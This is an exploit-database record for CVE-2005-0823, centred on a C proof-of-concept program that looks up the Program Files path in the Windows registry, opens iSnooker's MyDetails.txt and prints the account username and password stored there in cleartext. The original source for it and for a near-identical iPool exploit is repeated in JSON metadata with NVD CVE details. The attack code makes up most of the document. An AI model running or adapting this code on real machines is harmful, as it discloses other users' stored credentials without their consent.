ID EDB-ID:884
Type exploitdb
Reporter Kozan
Modified 2005-03-16T00:00:00
Description
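iSnooker <= 1.6.8 Local Password Disclosure Exploit (CVE-2005-0823). The application stores the account username and password in cleartext in MyDetails.txt, where local users can read them. Local exploit for the Windows platform.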
/*****************************************************************
iSnooker <= v1.6.8 Local Password Disclosure Exploit by Kozan
Application: iSnooker 1.6.8
Vendor:
Memir Software - memirsoftware.com and
The Snooker Club - thesnookerclub.com
Vulnerability Description:
iSnooker 1.6.8 stores the account username and password in cleartext
in MyDetails.txt, so the credentials are disclosed to local users.
Discovered & Coded by Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com
*****************************************************************/
#include <stdio.h>
#include <string.h>
#include <windows.h>
/* Capacity, in bytes, of the buffer that receives the ProgramFilesDir value. */
#define BUFSIZE 100

/* File-scope state used by main() for the registry lookup. */
char  prgfiles[BUFSIZE];      /* receives the "ProgramFilesDir" registry value */
DWORD dwBufLen = BUFSIZE;     /* in: buffer size passed to the query; out: bytes written */
HKEY  hKey;                   /* handle returned by RegOpenKeyEx */
LONG  lRet;                   /* status code returned by RegQueryValueEx */
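/* Longest field (in bytes, before the CR) that the reader accepts. */
enum { FIELD_MAX = 30 };

/*
 * Read one CR-terminated field from fp into dst (capacity cap bytes).
 *
 * Returns 0 and a NUL-terminated string when a 0x0D byte is found within
 * FIELD_MAX bytes; returns -1 and an empty string on EOF, a read error, or
 * when no CR is seen in time. The original code stored getc()'s result in a
 * char (so EOF was indistinguishable from data) and left the output buffer
 * uninitialised when no CR was found.
 */
static int read_cr_field(FILE *fp, char *dst, size_t cap)
{
    size_t n = 0;

    while (n < FIELD_MAX && n + 1 < cap) {
        int c = getc(fp);            /* int, so EOF can be told apart from a byte */

        if (c == EOF)
            break;
        if (c == 0x0D) {
            dst[n] = '\0';
            return 0;
        }
        dst[n++] = (char)c;
    }

    if (cap > 0)
        dst[0] = '\0';
    return -1;
}

/*
 * Proof of concept for CVE-2005-0823.
 *
 * Root cause shown by this program: iSnooker keeps the account username and
 * password as two plain CR/LF-terminated text lines in
 *   <ProgramFilesDir>\TheSnookerClub\iSnooker\MyDetails.txt
 * so reading the file is all that is needed to recover them. The remedy is
 * on the application side: credentials must not be written to disk in
 * cleartext.
 *
 * Steps: look up ProgramFilesDir in the registry, build the file path, read
 * the first two lines and print them.
 *
 * Returns 0 on success, -1 on any failure (same message as the original).
 */
int main(void)
{
    static const char suffix[] = "\\TheSnookerClub\\iSnooker\\MyDetails.txt";
    char pwdfile[BUFSIZE + sizeof suffix];
    char username[BUFSIZE] = "";
    char password[BUFSIZE] = "";
    FILE *fp;
    int n;

    /* The buffers are char, so call the ANSI entry points explicitly rather
     * than the TCHAR macros, which would select the wide versions under
     * UNICODE. */
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE,
                      "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                      0,
                      KEY_QUERY_VALUE,
                      &hKey) != ERROR_SUCCESS) {
        printf("An error occured. Can't get password!\n");
        return -1;
    }

    /* Reserve one byte: the registry does not guarantee that a stored
     * string is NUL-terminated. */
    dwBufLen = BUFSIZE - 1;
    lRet = RegQueryValueExA(hKey, "ProgramFilesDir", NULL, NULL,
                            (LPBYTE)prgfiles, &dwBufLen);
    RegCloseKey(hKey);

    if (lRet != ERROR_SUCCESS || dwBufLen >= BUFSIZE) {
        printf("An error occured. Can't get password!\n");
        return -1;
    }
    prgfiles[dwBufLen] = '\0';

    printf("\n\niSnooker 1.6.8 Local Password Disclosure Exploit by Kozan\n");
    printf("Credits to ATmaCA\n");
    printf("kozan@netmagister.com\n");
    printf("www.netmagister.com - www.spyinstructors.com\n\n");

    /* The original appended the suffix to prgfiles with strcat() and copied
     * the result into a 100-byte buffer, overflowing both for a long
     * ProgramFilesDir. Build the path with an explicit bound instead. */
    n = snprintf(pwdfile, sizeof pwdfile, "%s%s", prgfiles, suffix);
    if (n < 0 || (size_t)n >= sizeof pwdfile) {
        printf("An error occured. Can't get password!\n");
        return -1;
    }

    if ((fp = fopen(pwdfile, "rb")) == NULL) {
        printf("An error occured. Can't get password!\n");
        return -1;
    }

    /* First line: username. Then skip the single byte that follows the CR
     * (the LF of the line ending) and read the second line: password. */
    if (read_cr_field(fp, username, sizeof username) != 0 ||
        fseek(fp, 1L, SEEK_CUR) != 0 ||
        read_cr_field(fp, password, sizeof password) != 0) {
        fclose(fp);
        printf("An error occured. Can't get password!\n");
        return -1;
    }

    fclose(fp);

    printf("Username : %s\n", username);
    printf("Password : %s\n", password);

    return 0;
}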
// milw0rm.com [2005-03-16]
{"id": "EDB-ID:884", "type": "exploitdb", "bulletinFamily": "exploit", "title": "iSnooker <= 1.6.8 - Local Password Disclosure Exploit", "description": "iSnooker <= 1.6.8 Local Password Disclosure Exploit. CVE-2005-0823. Local exploit for windows platform", "published": "2005-03-16T00:00:00", "modified": "2005-03-16T00:00:00", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/884/", "reporter": "Kozan", "references": [], "cvelist": ["CVE-2005-0823"], "lastseen": "2016-01-31T13:06:19", "viewCount": 9, "enchantments": {"score": {"value": 4.9, "vector": "NONE", "modified": "2016-01-31T13:06:19", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0823"]}, {"type": "exploitdb", "idList": ["EDB-ID:885"]}], "modified": "2016-01-31T13:06:19", "rev": 2}, "vulnersScore": 4.9}, "sourceHref": "https://www.exploit-db.com/download/884/", "sourceData": "/*****************************************************************\r\n\r\niSnooker <= v1.6.8 Local Password Disclosure Exploit by Kozan\r\n\r\nApplication: iSnooker 1.6.8\r\n\r\nVendor:\r\nMemir Software - memirsoftware.com and\r\nThe Snooker Club - thesnookerclub.com\r\n\r\nVulnerable Description:\r\niSnooker 1.6.8 discloses passwords to local users.\r\n\r\nDiscovered & Coded by Kozan\r\nCredits to ATmaCA\r\nWeb : www.netmagister.com\r\nWeb2: www.spyinstructors.com\r\nMail: kozan@netmagister.com\r\n\r\n*****************************************************************/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <windows.h>\r\n\r\nHKEY hKey;\r\n#define BUFSIZE 100\r\nchar prgfiles[BUFSIZE];\r\nDWORD dwBufLen=BUFSIZE;\r\nLONG lRet;\r\n\r\nint main()\r\n{\r\n if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,\r\n\r\n\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\",\r\n 0,\r\n KEY_QUERY_VALUE,\r\n &hKey) == ERROR_SUCCESS)\r\n {\r\n\r\n lRet = RegQueryValueEx( hKey, \"ProgramFilesDir\", NULL, NULL,\r\n (LPBYTE) 
prgfiles, &dwBufLen);\r\n\r\n if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){\r\n RegCloseKey(hKey);\r\n printf(\"An error occured. Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n RegCloseKey(hKey);\r\n\r\n }\r\n else\r\n {\r\n printf(\"An error occured. Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n printf(\"\\n\\niSnooker 1.6.8 Local Password Disclosure Exploit by Kozan\\n\");\r\n printf(\"Credits to ATmaCA\\n\");\r\n printf(\"kozan@netmagister.com\\n\");\r\n printf(\"www.netmagister.com - www.spyinstructors.com\\n\\n\");\r\n\r\n char pwdfile[BUFSIZE], username[BUFSIZE], password[BUFSIZE];\r\n\r\nstrcpy(pwdfile,strcat(prgfiles,\"\\\\TheSnookerClub\\\\iSnooker\\\\MyDetails.txt\"));\r\n\r\n int addr, i, y;\r\n FILE *fp;\r\n char ch[100], ch2[100];\r\n\r\n if((fp=fopen(pwdfile,\"rb\")) == NULL)\r\n {\r\n printf(\"An error occured. Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n fseek(fp,0,0);\r\n\r\n for(i=0;i<30;i++)\r\n {\r\n ch[i]=getc(fp);\r\n if(ch[i]==0x0D)\r\n {\r\n ch[i]=NULL;\r\n strcpy(username,ch);\r\n break;\r\n }\r\n }\r\n\r\n addr = ftell(fp);\r\n fseek(fp,addr+1,0);\r\n\r\n for(y=0;y<30;y++)\r\n {\r\n ch2[y]=getc(fp);\r\n if(ch2[y]==0x0D)\r\n {\r\n ch2[y]=NULL;\r\n strcpy(password,ch2);\r\n break;\r\n }\r\n }\r\n\r\n fclose(fp);\r\n\r\n printf(\"Username : %s\\n\",username);\r\n printf(\"Password : %s\\n\",password);\r\n\r\n return 0;\r\n}\n\n// milw0rm.com [2005-03-16]\n", "osvdbidlist": ["14838"]}
{"cve": [{"lastseen": "2020-12-09T19:22:19", "description": "ThePoolClub (1) iPool and (2) iSnooker 1.6.81 and earlier stores usernames and passwords in cleartext in the MyDetails.txt file, which allows local users to gain privileges.", "edition": 5, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-0823", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0823"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:thepoolclub:isnooker:1.6.8", "cpe:/a:thepoolclub:ipool:1.6.81"], "id": "CVE-2005-0823", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0823", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:thepoolclub:ipool:1.6.81:*:*:*:*:*:*:*", "cpe:2.3:a:thepoolclub:isnooker:1.6.8:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T13:06:28", "description": "iPool <= 1.6.81 Local Password Disclosure Exploit. CVE-2005-0823. 
Local exploit for windows platform", "published": "2005-03-16T00:00:00", "type": "exploitdb", "title": "iPool <= 1.6.81 - Local Password Disclosure Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0823"], "modified": "2005-03-16T00:00:00", "id": "EDB-ID:885", "href": "https://www.exploit-db.com/exploits/885/", "sourceData": "/*****************************************************************\r\n\r\niPool <= v1.6.81 Local Password Disclosure Exploit by Kozan\r\n\r\nApplication: iPool 1.6.81\r\n\r\nVendor:\r\nMemir Software - memirsoftware.com and\r\nThe Pool Club - thepoolclub.com\r\n\r\nVulnerable Description:\r\niPool 1.6.81 discloses passwords to local users.\r\n\r\nDiscovered & Coded by Kozan\r\nCredits to ATmaCA\r\nWeb : www.netmagister.com\r\nWeb2: www.spyinstructors.com\r\nMail: kozan@netmagister.com\r\n\r\n*****************************************************************/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <windows.h>\r\n\r\nHKEY hKey;\r\n#define BUFSIZE 100\r\nchar prgfiles[BUFSIZE];\r\nDWORD dwBufLen=BUFSIZE;\r\nLONG lRet;\r\n\r\nint main()\r\n{\r\n if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,\r\n\r\n\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\",\r\n 0,\r\n KEY_QUERY_VALUE,\r\n &hKey) == ERROR_SUCCESS)\r\n {\r\n\r\n lRet = RegQueryValueEx( hKey, \"ProgramFilesDir\", NULL, NULL,\r\n (LPBYTE) prgfiles, &dwBufLen);\r\n\r\n if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){\r\n RegCloseKey(hKey);\r\n printf(\"An error occured. Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n RegCloseKey(hKey);\r\n\r\n }\r\n else\r\n {\r\n printf(\"An error occured. 
Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n printf(\"\\n\\niPool 1.6.81 Local Password Disclosure Exploit by Kozan\\n\");\r\n printf(\"Credits to ATmaCA\\n\");\r\n printf(\"kozan@netmagister.com\\n\");\r\n printf(\"www.netmagister.com - www.spyinstructors.com\\n\\n\");\r\n\r\n char pwdfile[BUFSIZE], username[BUFSIZE], password[BUFSIZE];\r\n strcpy(pwdfile,strcat(prgfiles,\"\\\\ThePoolClub\\\\iPool\\\\MyDetails.txt\"));\r\n\r\n int addr, i, y;\r\n FILE *fp;\r\n char ch[100], ch2[100];\r\n\r\n if((fp=fopen(pwdfile,\"rb\")) == NULL)\r\n {\r\n printf(\"An error occured. Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n fseek(fp,0,0);\r\n\r\n for(i=0;i<30;i++)\r\n {\r\n ch[i]=getc(fp);\r\n if(ch[i]==0x0D)\r\n {\r\n ch[i]=NULL;\r\n strcpy(username,ch);\r\n break;\r\n }\r\n }\r\n\r\n addr = ftell(fp);\r\n fseek(fp,addr+1,0);\r\n\r\n for(y=0;y<30;y++)\r\n {\r\n ch2[y]=getc(fp);\r\n if(ch2[y]==0x0D)\r\n {\r\n ch2[y]=NULL;\r\n strcpy(password,ch2);\r\n break;\r\n }\r\n }\r\n\r\n fclose(fp);\r\n\r\n printf(\"Username : %s\\n\",username);\r\n printf(\"Password : %s\\n\",password);\r\n\r\n return 0;\r\n}\n\n// milw0rm.com [2005-03-16]\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/885/"}]}